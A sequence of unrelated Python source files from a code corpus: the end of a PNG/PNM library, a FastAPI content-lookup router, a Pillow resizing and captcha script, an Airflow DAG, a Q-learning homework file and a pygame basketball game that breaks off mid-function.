> 8, then rescaling to 8-bit values loses precision. No
dithering is performed. Like :meth:`asRGB`, an alpha channel
in the source image will raise an exception.
This function returns a 4-tuple:
(*width*, *height*, *pixels*, *metadata*).
*width*, *height*, *metadata* are as per the
:meth:`read` method.
*pixels* is the pixel data in boxed row flat pixel format.
"""
return self._as_rescale(self.asRGB, 8)
def asRGBA8(self):
"""Return the image data as RGBA pixels with 8-bits per
sample. This method is similar to :meth:`asRGB8` and
:meth:`asRGBA`: The result pixels have an alpha channel, *and*
values are rescaled to the range 0 to 255. The alpha channel is
synthesized if necessary (with a small speed penalty).
"""
return self._as_rescale(self.asRGBA, 8)
def asRGB(self):
"""Return image as RGB pixels. RGB colour images are passed
through unchanged; greyscales are expanded into RGB
triplets (there is a small speed overhead for doing this).
An alpha channel in the source image will raise an
exception.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha']:
raise Error("will not convert image with alpha channel to RGB")
if not meta['greyscale']:
return width,height,pixels,meta
meta['greyscale'] = False
typecode = 'BH'[meta['bitdepth'] > 8]
def iterrgb():
for row in pixels:
a = array(typecode, [0]) * 3 * width
for i in range(3):
a[i::3] = row
yield a
return width,height,iterrgb(),meta
    def asRGBA(self):
        """Return image as RGBA pixels.  Greyscales are expanded into
        RGB triplets; an alpha channel is synthesized if necessary.

        The return values are as for the :meth:`read` method
        except that the *metadata* reflect the returned pixels, not the
        source image.  In particular, for this method
        ``metadata['greyscale']`` will be ``False``, and
        ``metadata['alpha']`` will be ``True``.
        """
        width,height,pixels,meta = self.asDirect()
        if meta['alpha'] and not meta['greyscale']:
            # Already RGBA: nothing to do.
            return width,height,pixels,meta
        typecode = 'BH'[meta['bitdepth'] > 8]
        maxval = 2**meta['bitdepth'] - 1
        # Template row pre-filled with opaque alpha in every sample;
        # conversion then only needs to overwrite the colour channels.
        maxbuffer = struct.pack('=' + typecode, maxval) * 4 * width
        def newarray():
            return array(typecode, maxbuffer)

        # Choose a converter once, based on the source layout.
        if meta['alpha'] and meta['greyscale']:
            # LA to RGBA
            def convert():
                for row in pixels:
                    # Create a fresh target row, then copy L channel
                    # into first three target channels, and A channel
                    # into fourth channel.
                    a = newarray()
                    pngfilters.convert_la_to_rgba(row, a)
                    yield a
        elif meta['greyscale']:
            # L to RGBA
            def convert():
                for row in pixels:
                    a = newarray()
                    pngfilters.convert_l_to_rgba(row, a)
                    yield a
        else:
            assert not meta['alpha'] and not meta['greyscale']
            # RGB to RGBA
            def convert():
                for row in pixels:
                    a = newarray()
                    pngfilters.convert_rgb_to_rgba(row, a)
                    yield a
        meta['alpha'] = True
        meta['greyscale'] = False
        return width,height,convert(),meta
def check_bitdepth_colortype(bitdepth, colortype):
    """Check that `bitdepth` and `colortype` are both valid,
    and specified in a valid combination.  Returns (None) if valid,
    raise an Exception if not valid.
    """
    if bitdepth not in (1,2,4,8,16):
        raise FormatError("invalid bit depth %d" % bitdepth)
    if colortype not in (0,2,3,4,6):
        raise FormatError("invalid colour type %d" % colortype)
    # Check indexed (palettized) images have 8 or fewer bits
    # per pixel; check only indexed or greyscale images have
    # fewer than 8 bits per pixel.
    if colortype & 1 and bitdepth > 8:
        # Bug fix: the format arguments were previously passed as
        # (bitdepth, colortype), reporting each value under the other
        # label; they now match the placeholders.
        raise FormatError(
          "Indexed images (colour type %d) cannot"
          " have bitdepth > 8 (bit depth %d)."
          " See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
          % (colortype, bitdepth))
    if bitdepth < 8 and colortype not in (0,3):
        raise FormatError("Illegal combination of bit depth (%d)"
          " and colour type (%d)."
          " See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
          % (bitdepth, colortype))
def isinteger(x):
    """Return True when `x` equals an integer value (e.g. 3 or 3.0),
    False for non-integral values and for values that int() cannot
    convert at all.
    """
    try:
        return x == int(x)
    except (TypeError, ValueError):
        return False
# === Support for users without Cython ===

try:
    # When the Cython-compiled accelerator module has already defined
    # pngfilters, keep it; otherwise fall back to the pure-Python
    # implementations below.
    pngfilters
except NameError:
    class pngfilters(object):
        """Pure-Python fallback for the scanline filter and colour
        conversion kernels.  All operations mutate `result` in place.
        """
        def undo_filter_sub(filter_unit, scanline, previous, result):
            """Undo sub filter."""

            ai = 0
            # Loops starts at index fu.  Observe that the initial part
            # of the result is already filled in correctly with
            # scanline.
            for i in range(filter_unit, len(result)):
                x = scanline[i]
                a = result[ai]
                result[i] = (x + a) & 0xff
                ai += 1
        undo_filter_sub = staticmethod(undo_filter_sub)

        def undo_filter_up(filter_unit, scanline, previous, result):
            """Undo up filter."""

            for i in range(len(result)):
                x = scanline[i]
                b = previous[i]
                result[i] = (x + b) & 0xff
        undo_filter_up = staticmethod(undo_filter_up)

        def undo_filter_average(filter_unit, scanline, previous, result):
            """Undo average filter."""

            ai = -filter_unit
            for i in range(len(result)):
                x = scanline[i]
                # `a` is the corresponding byte of the previous pixel;
                # zero while still inside the first pixel.
                if ai < 0:
                    a = 0
                else:
                    a = result[ai]
                b = previous[i]
                result[i] = (x + ((a + b) >> 1)) & 0xff
                ai += 1
        undo_filter_average = staticmethod(undo_filter_average)

        def undo_filter_paeth(filter_unit, scanline, previous, result):
            """Undo Paeth filter."""

            # Also used for ci.
            ai = -filter_unit
            for i in range(len(result)):
                x = scanline[i]
                if ai < 0:
                    a = c = 0
                else:
                    a = result[ai]
                    c = previous[ai]
                b = previous[i]
                # Paeth predictor: pick whichever of a, b, c is
                # closest to p = a + b - c (ties prefer a, then b).
                p = a + b - c
                pa = abs(p - a)
                pb = abs(p - b)
                pc = abs(p - c)
                if pa <= pb and pa <= pc:
                    pr = a
                elif pb <= pc:
                    pr = b
                else:
                    pr = c
                result[i] = (x + pr) & 0xff
                ai += 1
        undo_filter_paeth = staticmethod(undo_filter_paeth)

        def convert_la_to_rgba(row, result):
            """Convert an LA image row to RGBA.  The L channel is
            copied into the first three target channels and the A
            channel into the fourth.
            """
            for i in range(3):
                result[i::4] = row[0::2]
            result[3::4] = row[1::2]
        convert_la_to_rgba = staticmethod(convert_la_to_rgba)

        def convert_l_to_rgba(row, result):
            """Convert a grayscale image to RGBA. This method assumes
            the alpha channel in result is already correctly
            initialized.
            """
            for i in range(3):
                result[i::4] = row
        convert_l_to_rgba = staticmethod(convert_l_to_rgba)

        def convert_rgb_to_rgba(row, result):
            """Convert an RGB image to RGBA. This method assumes the
            alpha channel in result is already correctly initialized.
            """
            for i in range(3):
                result[i::4] = row[i::3]
        convert_rgb_to_rgba = staticmethod(convert_rgb_to_rgba)
# === Command Line Support ===
def read_pam_header(infile):
    """
    Read (the rest of a) PAM header.  `infile` should be positioned
    immediately after the initial 'P7' line (at the beginning of the
    second line).  Returns are as for `read_pnm_header`.

    Raises `EOFError` on a truncated header and `Error` when required
    fields are missing or non-positive.
    """
    # Unlike PBM, PGM, and PPM, we can read the header a line at a time.
    header = dict()
    while True:
        l = infile.readline().strip()
        if l == b'ENDHDR':
            break
        if not l:
            raise EOFError('PAM ended prematurely')
        # Bug fix: indexing a bytes object yields an int on Python 3,
        # so the old test `l[0] == b'#'` never matched (and a bare "#"
        # line crashed below); use startswith instead.
        if l.startswith(b'#'):
            continue
        l = l.split(None, 1)
        # Repeated keys have their values concatenated, per the PAM
        # convention for multi-line values.
        if l[0] not in header:
            header[l[0]] = l[1]
        else:
            header[l[0]] += b' ' + l[1]

    required = [b'WIDTH', b'HEIGHT', b'DEPTH', b'MAXVAL']
    WIDTH,HEIGHT,DEPTH,MAXVAL = required
    present = [x for x in required if x in header]
    if len(present) != len(required):
        raise Error('PAM file must specify WIDTH, HEIGHT, DEPTH, and MAXVAL')
    width = int(header[WIDTH])
    height = int(header[HEIGHT])
    depth = int(header[DEPTH])
    maxval = int(header[MAXVAL])
    if (width <= 0 or
        height <= 0 or
        depth <= 0 or
        maxval <= 0):
        raise Error(
          'WIDTH, HEIGHT, DEPTH, MAXVAL must all be positive integers')
    return 'P7', width, height, depth, maxval
def read_pnm_header(infile, supported=(b'P5', b'P6')):
    """
    Read a PNM header, returning (format,width,height,depth,maxval).
    `width` and `height` are in pixels.  `depth` is the number of
    channels in the image; for PBM and PGM it is synthesized as 1, for
    PPM as 3; for PAM images it is read from the header.  `maxval` is
    synthesized (as 1) for PBM images.
    """
    # Generally, see http://netpbm.sourceforge.net/doc/ppm.html
    # and http://netpbm.sourceforge.net/doc/pam.html

    # Technically 'P7' must be followed by a newline, so by using
    # rstrip() we are being liberal in what we accept.  I think this
    # is acceptable.
    type = infile.read(3).rstrip()
    if type not in supported:
        raise NotImplementedError('file format %s not supported' % type)
    if type == b'P7':
        # PAM header parsing is completely different.
        return read_pam_header(infile)
    # Expected number of tokens in header (3 for P4, 4 for P6)
    expected = 4
    pbm = (b'P1', b'P4')
    if type in pbm:
        expected = 3
    header = [type]

    # We have to read the rest of the header byte by byte because the
    # final whitespace character (immediately following the MAXVAL in
    # the case of P6) may not be a newline.  Of course all PNM files in
    # the wild use a newline at this point, so it's tempting to use
    # readline; but it would be wrong.
    def getc():
        c = infile.read(1)
        if not c:
            raise Error('premature EOF reading PNM header')
        return c

    c = getc()
    while True:
        # Skip whitespace that precedes a token.
        while c.isspace():
            c = getc()
        # Skip comments.  Bug fix: infile.read(1) yields bytes, so the
        # old str comparisons ('#', '\n\r') never matched on Python 3;
        # compare against bytes, and also consume the whitespace that
        # follows a comment line so the next token is found.
        while c == b'#':
            while c not in b'\n\r':
                c = getc()
            while c.isspace():
                c = getc()
        if not c.isdigit():
            raise Error('unexpected character %s found in header' % c)
        # According to the specification it is legal to have comments
        # that appear in the middle of a token.
        # This is bonkers; I've never seen it; and it's a bit awkward to
        # code good lexers in Python (no goto).  So we break on such
        # cases.
        token = b''
        while c.isdigit():
            token += c
            c = getc()
        # Slight hack.  All "tokens" are decimal integers, so convert
        # them here.
        header.append(int(token))
        if len(header) == expected:
            break
        # Skip comments (again); bytes comparisons as above.
        while c == b'#':
            while c not in b'\n\r':
                c = getc()
    if not c.isspace():
        raise Error('expected header to end with whitespace, not %s' % c)
    if type in pbm:
        # synthesize a MAXVAL
        header.append(1)
    depth = (1,3)[type == b'P6']
    return header[0], header[1], header[2], depth, header[3]
def write_pnm(file, width, height, pixels, meta):
    """Write a Netpbm PNM/PAM image to the open binary file object
    `file`.

    The output format is chosen from the number of image planes in
    `meta`: 1 plane is PGM, 3 is PPM, and 2 or 4 (images with an
    alpha channel) are PAM.
    """
    bitdepth = meta['bitdepth']
    maxval = 2**bitdepth - 1
    # Rudely, the number of image planes can be used to determine
    # whether we are L (PGM), LA (PAM), RGB (PPM), or RGBA (PAM).
    planes = meta['planes']
    # Can be an assert as long as we assume that pixels and meta came
    # from a PNG file.
    assert planes in (1,2,3,4)
    if planes in (1,3):
        # PGM ('P5') for one plane, PPM ('P6') for three.  We could
        # generate PBM when maxval is 1, but we don't (for one thing,
        # we would have to convert the data, not just blat it out).
        fmt = 'P5' if planes == 1 else 'P6'
        header = '%s %d %d %d\n' % (fmt, width, height, maxval)
    if planes in (2,4):
        # PAM; see http://netpbm.sourceforge.net/doc/pam.html
        tupltype = 'GRAYSCALE_ALPHA' if planes == 2 else 'RGB_ALPHA'
        header = ('P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\n'
                  'TUPLTYPE %s\nENDHDR\n' %
                  (width, height, planes, maxval, tupltype))
    file.write(header.encode('ascii'))
    # Values per row, serialised big-endian with one byte per value
    # unless maxval needs two.
    vpr = planes * width
    row_fmt = '>%d%s' % (vpr, 'H' if maxval > 0xff else 'B')
    for row in pixels:
        file.write(struct.pack(row_fmt, *row))
    file.flush()
def color_triple(color):
    """
    Convert a command line colour value to a RGB triple of integers.
    FIXME: Somewhere we need support for greyscale backgrounds etc.

    Accepts '#RGB', '#RRGGBB', and '#RRRRGGGGBBBB'; returns None for
    anything else.
    """
    if not color.startswith('#'):
        return None
    if len(color) == 4:
        # One hex digit per channel.
        return tuple(int(digit, 16) for digit in color[1:4])
    if len(color) == 7:
        # Two hex digits per channel.
        return tuple(int(color[i:i+2], 16) for i in (1, 3, 5))
    if len(color) == 13:
        # Four hex digits per channel (16-bit samples).
        return tuple(int(color[i:i+4], 16) for i in (1, 5, 9))
def _add_common_options(parser):
"""Call *parser.add_option* for each of the options that are
common between this PNG--PNM conversion tool and the gen
tool.
"""
parser.add_option("-i", "--interlace",
default=False, action="store_true",
help="create an interlaced PNG file (Adam7)")
parser.add_option("-t", "--transparent",
action="store", type="string", metavar="#RRGGBB",
help="mark the specified colour as transparent")
parser.add_option("-b", "--background",
action="store", type="string", metavar="#RRGGBB",
help="save the specified background colour")
parser.add_option("-g", "--gamma",
action="store", type="float", metavar="value",
help="save the specified gamma value")
parser.add_option("-c", "--compression",
action="store", type="int", metavar="level",
help="zlib compression level (0-9)")
return parser
def _main(argv):
    """
    Run the PNG encoder with options from the command line.

    Reads the named file (or stdin) and writes the converted image to
    stdout: PNG -> PNM with -r/--read-png, PNM -> PNG otherwise.
    """
    # Parse command line arguments
    from optparse import OptionParser
    version = '%prog ' + __version__
    parser = OptionParser(version=version)
    parser.set_usage("%prog [options] [imagefile]")
    parser.add_option('-r', '--read-png', default=False,
                      action='store_true',
                      help='Read PNG, write PNM')
    parser.add_option("-a", "--alpha",
                      action="store", type="string", metavar="pgmfile",
                      help="alpha channel transparency (RGBA)")
    _add_common_options(parser)
    (options, args) = parser.parse_args(args=argv[1:])
    # Convert options
    if options.transparent is not None:
        options.transparent = color_triple(options.transparent)
    if options.background is not None:
        options.background = color_triple(options.background)
    # Prepare input and output files
    if len(args) == 0:
        infilename = '-'
        infile = sys.stdin
    elif len(args) == 1:
        infilename = args[0]
        infile = open(infilename, 'rb')
    else:
        parser.error("more than one input file")
    outfile = sys.stdout
    if sys.platform == "win32":
        # Stop Windows from translating \n in the binary output stream.
        import msvcrt, os
        msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
    if options.read_png:
        # Encode PNG to PPM
        png = Reader(file=infile)
        width,height,pixels,meta = png.asDirect()
        write_pnm(outfile, width, height, pixels, meta)
    else:
        # Encode PNM to PNG
        format, width, height, depth, maxval = \
          read_pnm_header(infile, (b'P5',b'P6',b'P7'))
        # When it comes to the variety of input formats, we do something
        # rather rude. Observe that L, LA, RGB, RGBA are the 4 colour
        # types supported by PNG and that they correspond to 1, 2, 3, 4
        # channels respectively. So we use the number of channels in
        # the source image to determine which one we have. We do not
        # care about TUPLTYPE.
        greyscale = depth <= 2
        pamalpha = depth in (2,4)
        # PNG supports bit depths 1..16, i.e. maxvals 1, 3, 7, ..., 65535.
        supported = [2**x-1 for x in range(1,17)]
        try:
            mi = supported.index(maxval)
        except ValueError:
            raise NotImplementedError(
              'your maxval (%s) not in supported list %s' %
              (maxval, str(supported)))
        bitdepth = mi+1
        writer = Writer(width, height,
                        greyscale=greyscale,
                        bitdepth=bitdepth,
                        interlace=options.interlace,
                        transparent=options.transparent,
                        background=options.background,
                        alpha=bool(pamalpha or options.alpha),
                        gamma=options.gamma,
                        compression=options.compression)
        if options.alpha:
            # Merge a separate PGM file in as the alpha channel.
            pgmfile = open(options.alpha, 'rb')
            format, awidth, aheight, adepth, amaxval = \
              read_pnm_header(pgmfile, 'P5')
            # NOTE(review): maxval is handled as an int elsewhere in this
            # function, so comparing amaxval to the string '255' looks
            # suspect -- confirm against read_pnm_header's return type.
            if amaxval != '255':
                raise NotImplementedError(
                  'maxval %s not supported for alpha channel' % amaxval)
            if (awidth, aheight) != (width, height):
                raise ValueError("alpha channel image size mismatch"
                                 " (%s has %sx%s but %s has %sx%s)"
                                 % (infilename, width, height,
                                    options.alpha, awidth, aheight))
            writer.convert_ppm_and_pgm(infile, pgmfile, outfile)
        else:
            writer.convert_pnm(infile, outfile)
if __name__ == '__main__':
    try:
        _main(sys.argv)
    except Error as e:
        # Report PNG-level errors on stderr without a traceback.
        print(e, file=sys.stderr)
| pret/pokered | tools/pokemontools/png.py | png.py | py | 100,616 | python | en | code | 3,597 | github-code | 13 |
18664987365 |
from fastapi import Depends, HTTPException, status, APIRouter, Request, Response
from database import engineconn
from db_class import MOVIE, TV, BOOK, WEBTOON
from sqlalchemy.orm import Session
import json
router = APIRouter()
with open('contents_idx.json', 'r', encoding='UTF-8') as f:
contents_idx = json.load(f)
def get_db():
    """FastAPI dependency that yields a SQLAlchemy session.

    The session is always closed after the request finishes.  The
    engine/session creation happens *before* the try block: in the
    original, a failure there ran ``db.close()`` in the ``finally`` on a
    name that was never bound, masking the real error with an
    UnboundLocalError.
    """
    engine = engineconn()
    db = engine.sessionmaker()
    try:
        yield db
    finally:
        db.close()
async def show_content(index: int, db:Session = Depends(get_db)):
    """
    Look up one content row by its global index.

    return: category ('m'ovie, 't'v, 'b'ook, 'w'ebtoon) and the matching
    ORM row, or None when the lookup fails or the category is unknown.
    """
    # contents_idx maps "<index>" -> "<name><category letter>".
    name = contents_idx[str(index)][:-1]
    cat = contents_idx[str(index)][-1]
    # fix: `content` was unbound (NameError at the return) when `cat`
    # matched no branch; a leftover debug print was also removed.
    content = None
    try:
        if cat == 'm':
            content = db.query(MOVIE).filter(MOVIE.name == name).first()
        elif cat == 't':
            content = db.query(TV).filter(TV.name == name).first()
        elif cat == 'b':
            content = db.query(BOOK).filter(BOOK.name == name).first()
        elif cat == 'w':
            content = db.query(WEBTOON).filter(WEBTOON.name == name).first()
    except Exception:
        # Best-effort lookup: any DB error degrades to "no content",
        # matching the original's swallow-and-return behaviour.
        content = None
    return cat, content
async def similar_content(index: int, db:Session = Depends(get_db)):
    """
    Args:
        index: integer index of a content
    Return:
        list of contents (index, category, content name)
    """
    # indices.txt: one line per content; the first token looks like the
    # content's own id and the rest are related ids (0-based, hence the
    # +1 below) -- presumably similarity-ranked; confirm with whatever
    # generates the file.
    with open('./routers/indices.txt','rb') as f:
        indices = f.readlines()
    output = indices[index-1].decode('UTF-8').split()[1:]
    output = [int(elem)+1 for elem in output]
    # print(output)
    result = []
    # Keep at most the first 5 related ids that still resolve in the DB.
    for idx in output[:5]:
        cat, item = await show_content(idx, db)
        if(item is not None):
            result.append([idx, cat, item.name])
    return result
async def get_multiple_contents(idx_list, db:Session = Depends(get_db)):
    """
    Get information of multiple contents at once.

    Return:
        list of [index, category, content name] triples; indices whose
        lookup yields no row are silently dropped.
    """
    found = []
    for content_idx in idx_list:
        category, row = await show_content(content_idx, db)
        if row is None:
            continue
        found.append([content_idx, category, row.name])
    return found
| jjklle/SWE3028 | routers/content.py | content.py | py | 2,220 | python | en | code | 0 | github-code | 13 |
31986281811 | from PIL import Image
# --- Method 1: Image.resize -------------------------------------------------
# Produces a new 400x400 image; the aspect ratio is NOT preserved.
image = Image.open('001.jpg')
print(image.size)  # report the original size
new_image = image.resize((400, 400))
new_image.save('001_400.jpg')  # save the stretched 400x400 copy

# --- Method 2: Image.thumbnail ----------------------------------------------
# Shrinks in place while preserving the aspect ratio (usually looks nicer).
image = Image.open('001.jpg')
print(image.size)
# fix: the method is `thumbnail` (the original misspelled it `thunbnail`,
# which raised AttributeError).  It modifies `image` in place and returns
# None, so its result is not assigned.
image.thumbnail((400, 400))
image.save('new_image2.jpg')

# --- Paste a logo onto an image ---------------------------------------------
image = Image.open('002.jpg')
logo = Image.open('logo.jpg')
image_copy = image.copy()
# Bottom-right corner: offset by the logo's own size.
position = ((image_copy.width - logo.width), (image_copy.height - logo.height))
# NOTE(review): the third paste() argument is a transparency mask; a JPEG
# logo opens as RGB, which Pillow rejects as a mask -- confirm the logo's
# mode or drop the mask argument.
image_copy.paste(logo, position, logo)
image_copy.save('002_logo.jpg')
| 00xyz00/study_pillow | test1.py | test1.py | py | 816 | python | en | code | 0 | github-code | 13 |
37798051021 | # import math
# import numpy as np
# (x^y)%p in O(log y)
def power(x, y, p):
    """Compute (x ** y) % p in O(log y) by binary exponentiation.

    Classic square-and-multiply.  Note: a base divisible by p returns 0
    even when y == 0 (unlike the builtin three-argument pow).
    """
    base = x % p
    if base == 0:
        return 0
    result = 1
    while y > 0:
        if y & 1:                      # odd exponent: fold in current base
            result = (result * base) % p
        y >>= 1                        # halve the exponent ...
        base = (base * base) % p       # ... and square the base
    return result
def parser():
    # Generator that yields whitespace-separated tokens from stdin one at
    # a time, blocking on input() whenever the current line is exhausted.
    while 1:
        data = list(input().split(' '))
        for number in data:
            if len(number) > 0:
                yield(number)
input_parser = parser()
def get_word():
    # Pull the next token from the shared stdin tokenizer.
    global input_parser
    return next(input_parser)
def get_number():
    # Parse the next stdin token as an int when possible, else as float.
    data = get_word()
    try:
        return int(data)
    except ValueError:
        return float(data)
# Read p, q, n, m and print sum_{k=1..n} p^k * k^q (mod m).
p,q,n,m = [int(i) for i in input().split()]
res = sum((pow(p,k,m)%m*(pow(k,q,m)%m))%m for k in (range(1,n+1)))
res = res%m
print(res)
| jpitoskas/IEEEXtreme15.0 | summation.py | summation.py | py | 977 | python | en | code | 0 | github-code | 13 |
6999415003 | import logging
import airflow
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.sensors.external_task import ExternalTaskSensor
from datetime import datetime, timedelta
# Root logging config plus a module logger (currently unused below).
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# Default arguments applied to every task in this DAG.
args = {
    "owner": "airflow",
    "start_date": airflow.utils.dates.days_ago(1)
}
# Runs daily at 06:55 (cron: minute hour day month weekday).
dag = DAG(
    dag_id="Second", default_args=args, schedule_interval='55 06 * * *'
)
def pp():
    # Callable for second_task; just reports the dependency on DAG "First".
    print("second task depends on first task")
with dag:
    second_task = PythonOperator(task_id="second_task", python_callable=pp, dag=dag)
    # Block second_task until `first_task` of DAG "First" has finished.
    # execution_delta: the sensed run is 10 minutes earlier than this
    # one's logical date (First presumably runs at 06:45 -- TODO confirm).
    ExternalTaskSensor(
        task_id='external_sensor_task',
        external_dag_id='First',
        external_task_id='first_task',
        execution_delta=timedelta(minutes=10),
        timeout=300,
        dag=dag
    ) >> second_task
| itnoobzzy/EasyAirflow | dags/second.py | second.py | py | 854 | python | en | code | 0 | github-code | 13 |
43928603974 | from PIL import Image, ImageFilter, ImageFont, ImageDraw
import random
import string
# 随机数字
def rndchar():
    """Return one random uppercase ASCII letter (code points 65..90)."""
    code_point = random.randint(65, 90)
    return chr(code_point)
# 随机数字+字母
def getrandl(num, many):
    """Return one random string of `num` characters (digits and letters).

    The original looped ``for x in range(many)`` but returned inside the
    first iteration, so `many` never produced more than one string; that
    dead loop is removed.  `many` stays in the signature for backward
    compatibility and, as before, a value below 1 yields None.
    """
    if many < 1:
        return None
    s = ''
    for _ in range(num):
        if random.randint(1, 2) == 1:   # 1 -> digit, 2 -> letter
            s += str(random.randint(0, 9))
        else:
            s += str(random.choice(string.ascii_letters))
    return s
def rndColor():
    """Random bright RGB triple; each channel drawn from 64..255."""
    return tuple(random.randint(64, 255) for _ in range(3))
def rndColor2():
    """Random darker RGB triple; each channel drawn from 32..127."""
    return tuple(random.randint(32, 127) for _ in range(3))
# a = rndchar()
# b = rndchar()
# c = rndchar()
# d = rndchar()
# print(a,b,c,d)
# Canvas: 4 characters, 60x60 pixels each.
width = 60 * 4
height = 60
# Create the canvas (RGB mode).
img = Image.new('RGB', (width, height), (0, 0, 0))  # (0, 0, 0) = black
# img.show()
# Load the font (Microsoft YaHei, 36pt; the .ttc must be findable).
font = ImageFont.truetype('msyh.ttc', 36)
draw = ImageDraw.Draw(img)
# Fill every pixel with random bright noise.
for x in range(width):
    for y in range(height):
        draw.point((x, y), fill=rndColor())
# Draw the 4 captcha characters, one per 60px column, 10px from the top.
for t in range(4):
    # draw.text((60*x,10),rndchar(),font =font,file =(255,255,255))  # earlier letters-only variant
    draw.text((60 * t, 10), getrandl(1, 4), font=font, fill=rndColor())  # x advances 60px per char, y fixed at 10
# Blur slightly to make OCR harder, then save and show.
img = img.filter(ImageFilter.BLUR)
img.save(r'D:\DOWNLOAD\TEST1.PNG')
img.show()
| shenshuke/VerificationCode | tyjx/126.py | 126.py | py | 1,562 | python | en | code | 0 | github-code | 13 |
47044578924 | import random
student_name = "Jingjing Bai"
# 1. Q-Learning
class QLearningAgent:
    """Tabular Q-learning agent.

    Q-values live in a dict keyed by (state, action); pairs never seen
    default to 0.0.
    """

    def __init__(self, game, discount, learning_rate, explore_prob):
        """Store the problem and hyper-parameters; start with an empty Q-table.

        game: environment exposing get_actions(state).
        discount: gamma in the Bellman equation.
        learning_rate: alpha for the running-average update.
        explore_prob: epsilon for epsilon-greedy action selection.
        """
        self.game = game
        self.discount = discount
        self.alpha = learning_rate
        self.epsilon = explore_prob
        self.qvalues = {}

    def get_q_value(self, state, action):
        """Return Q(s, a); never-seen pairs are 0.0 by definition."""
        return self.qvalues.get((state, action), 0.0)

    def set_q_value(self, state, action, value):
        self.qvalues[(state, action)] = value

    def get_value(self, state):
        """State value via the Bellman equation: V(s) = max_a Q(s, a).

        A state with no legal actions has value 0.0.
        """
        qvalues = [self.get_q_value(state, action)
                   for action in self.game.get_actions(state)]
        if not qvalues:
            return 0.0
        return max(qvalues)

    def get_best_policy(self, state):
        """Policy extraction: pi(s) = argmax_a Q(s, a).

        Ties are broken uniformly at random for better performance;
        None is returned when the state has no legal actions.
        (The redundant function-local `import random` was removed; the
        module imports it at top level.)
        """
        best_value = self.get_value(state)
        best_actions = [action for action in self.game.get_actions(state)
                        if self.get_q_value(state, action) == best_value]
        if not best_actions:
            return None
        return random.choice(best_actions)

    def update(self, state, action, next_state, reward):
        """Running-average Q update:

        Q(s,a) = (1 - alpha) Q(s,a) + alpha (R + gamma V(s'))

        Note: not called by the agent itself; the training loop calls it.
        """
        qvalue = self.get_q_value(state, action)
        next_value = self.get_value(next_state)
        new_value = (1 - self.alpha) * qvalue + \
            self.alpha * (reward + self.discount * next_value)
        self.set_q_value(state, action, new_value)

    # 2. Epsilon Greedy
    def get_action(self, state):
        """Epsilon-greedy choice: with probability epsilon act randomly,
        otherwise follow the extracted best policy."""
        if random.random() < self.epsilon:
            return random.choice(list(self.game.get_actions(state)))
        return self.get_best_policy(state)
# 3. Bridge Crossing Revisited
def question3():
    """Bridge Crossing Revisited: the submitted answer is that no
    (epsilon, learning-rate) pair qualifies, so the sentinel string is
    returned.  The unused `epsilon = ...` / `learning_rate = ...`
    template placeholders were removed as dead code.
    """
    return 'NOT POSSIBLE'
# 5. Approximate Q-Learning
class ApproximateQAgent(QLearningAgent):
    """Approximate Q-learning: Q(s, a) is a linear function of extracted
    features, so only one weight per feature is stored."""

    def __init__(self, *args, extractor):
        """Forward hyper-parameters to QLearningAgent, keep the feature
        extractor, and start with an empty weight table."""
        super().__init__(*args)
        self.featExtractor = extractor
        self.weights = {}

    def get_weight(self, feature):
        """Weight of a feature; never-seen features weigh 0."""
        return self.weights.get(feature, 0)

    def get_q_value(self, state, action):
        """Dot product of feature values and weights:

        Q(s,a) = w_1 * f_1(s,a) + w_2 * f_2(s,a) + ... + w_n * f_n(s,a)
        """
        features = self.featExtractor(state, action)
        return sum(self.get_weight(feature) * value
                   for feature, value in features.items())

    def update(self, state, action, next_state, reward):
        """Least-squares weight update.

        delta = R + gamma V(s') - Q(s,a)
        w_i  += alpha * delta * f_i(s, a)

        The original duplicated the update across seen/unseen features;
        get_weight() already supplies 0 for unseen ones.
        """
        features = self.featExtractor(state, action)
        correction = reward + self.discount * self.get_value(next_state) \
            - self.get_q_value(state, action)
        for feature, value in features.items():
            self.weights[feature] = \
                self.get_weight(feature) + self.alpha * correction * value
# 6. Feedback
# Just an approximation is fine.
feedback_question_1 = 4
feedback_question_2 = """
to jump out of MDP and think in RL way
"""
feedback_question_3 = """
UI design, this is easy to understand
"""
| jingjingb/cis521-hw7 | agents.py | agents.py | py | 5,086 | python | en | code | 0 | github-code | 13 |
7236899154 | import pygame
from random import randint
pygame.init()
score = 0
# NOTE(review): "widhte"/"lengte" are misspellings of width/height; they
# are used throughout the file, so renaming would touch every function.
screen_widhte = 1024
screen_lengte = 768
display_output = (screen_widhte, screen_lengte)
screen = pygame.display.set_mode(display_output)
pygame.display.set_caption('Basketball!')
# Assets (images and sound effects) loaded from the working directory.
Background = pygame.image.load("Basketball court.jpg.")
tick = pygame.mixer.Sound("gunshot.wav")
tick_2 = pygame.mixer.Sound("Sound scored.wav")
tick_3 = pygame.mixer.Sound("dynamite.wav")
tick_nope = pygame.mixer.Sound("Nope.ogg")
basketball = pygame.image.load("Basketball.png")
# Ball state: spawns at a random x along the top edge.
x = randint(0, screen_widhte)
y = 0
radius = 100
speed = 5
# Cached ball "centre" used for scoring (+50 offset -- presumably half
# the sprite size; TODO confirm against Basketball.png).
ball_rep_x = x + 50
ball_rep_y = y + 50
basket = pygame.image.load("Basketball hoop.png")
basket_width = 125
basket_pos_x = 450
basket_pos_y = 600
# Hoop hit-box edges relative to the basket sprite's top-left corner.
basket_rep_x = [basket_pos_x + 31, basket_pos_x + 94]
basket_rep_y = [basket_pos_y + 14, basket_pos_y + 20]
basket_speed = 8
# Colour constants.
black = (0, 0, 0)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
white = (255, 255, 255)
# Score text position and font.
text_x = 15
text_y = 15
font = pygame.font.Font("freesansbold.ttf", 40)
play = True
clock = pygame.time.Clock()
def check_for_event():
    """Drain the pygame event queue and apply keyboard input.

    Fixes two defects in the original:
    * a meaningless ``if __name__ == '__main__':`` guard inside the
      function body was removed;
    * key polling lived inside the for-event loop, so the basket only
      moved on frames that had at least one queued event.  Keys are now
      polled once per call, i.e. every frame.
    """
    global x, y, play, basket_pos_y, basket_pos_x
    for event in pygame.event.get():
